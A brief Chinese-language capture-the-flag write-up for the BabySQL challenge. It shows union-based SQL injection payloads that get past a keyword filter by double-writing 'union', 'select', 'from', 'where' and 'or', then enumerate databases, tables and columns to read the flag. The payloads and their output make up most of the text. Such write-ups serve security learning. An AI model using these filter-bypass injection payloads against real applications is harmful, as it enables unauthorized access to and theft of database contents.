[极客大挑战 2019]BabySQL
是个sql注入,先用单引号试一下发现有报错,看看过滤了什么
发现输入select和union的时候会被替换为空
尝试双写绕过
回显的地方在2,3的位置
爆数据库
password=admin' ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23
Your password is 'information_schema,mysql,performance_schema,test,ctf,geek
爆表名
password=admin' ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema='ctf' %23
Your password is 'Flag'
列名
password=admin' ununionion seselectlect 1,2,group_concat(column_name)frfromom(infoorrmation_schema.columns) whwhereere table_name='Flag' %23
Your password is 'flag'
查flag
password=admin' ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag) %23